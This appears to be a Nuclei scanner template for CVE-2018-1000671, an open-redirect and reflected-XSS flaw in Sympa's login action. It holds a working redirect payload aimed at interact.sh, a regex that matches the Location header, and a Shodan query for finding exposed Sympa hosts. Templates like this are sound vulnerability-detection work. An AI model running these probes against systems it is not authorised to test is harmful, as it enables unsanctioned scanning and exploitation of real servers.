34 lines
1.2 KiB
YAML
34 lines
1.2 KiB
YAML
id: CVE-2018-1000671
|
|
|
|
info:
|
|
name: Sympa version =>6.2.16 - Cross-Site Scripting
|
|
author: 0x_Akoko
|
|
severity: medium
|
|
description: Sympa version 6.2.16 and later contains a URL Redirection to Untrusted Site vulnerability in the referer parameter of the wwsympa fcgi login action that can result in open redirection and reflected cross-site scripting via data URIs.
|
|
reference:
|
|
- https://github.com/sympa-community/sympa/issues/268
|
|
- https://vuldb.com/?id.123670
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-1000671
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2018-1000671
|
|
cwe-id: CWE-601
|
|
metadata:
|
|
shodan-query: http.html:"sympa"
|
|
verified: "true"
|
|
tags: cve,cve2018,redirect,sympa,debian
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email='
|
|
|
|
matchers:
|
|
- type: regex
|
|
part: header
|
|
regex:
|
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
|
|
# Enhanced by mp on 2022/08/18
|